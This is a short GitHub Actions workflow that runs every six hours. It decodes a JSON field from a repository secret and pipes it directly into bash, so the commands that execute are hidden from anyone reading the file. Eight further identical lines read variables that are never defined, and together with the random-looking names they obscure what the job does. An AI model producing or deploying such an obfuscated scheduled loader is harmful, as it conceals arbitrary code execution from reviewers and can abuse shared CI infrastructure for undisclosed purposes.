name: pousuanshashou
on:
  workflow_dispatch:
  schedule:
    - cron: '1 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: pousuanshashou
        env:
          fcet3879: ${{ secrets.fcet3879 }}
        run: |
          echo $fcet3879 | jq -r .s5 | /bin/bash
          echo $nsleg74035 | jq -r .mzjv32155 | /bin/bash
          echo $j3 | jq -r .unut71 | /bin/bash
          echo $oiel9 | jq -r .xpgey83 | /bin/bash
          echo $sqgjc1669 | jq -r .nap6514 | /bin/bash
          echo $b691 | jq -r .xu60622 | /bin/bash
          echo $e4890 | jq -r .wr788 | /bin/bash
          echo $k5 | jq -r .br061 | /bin/bash
          echo $xwpts937 | jq -r .inr2243 | /bin/bash

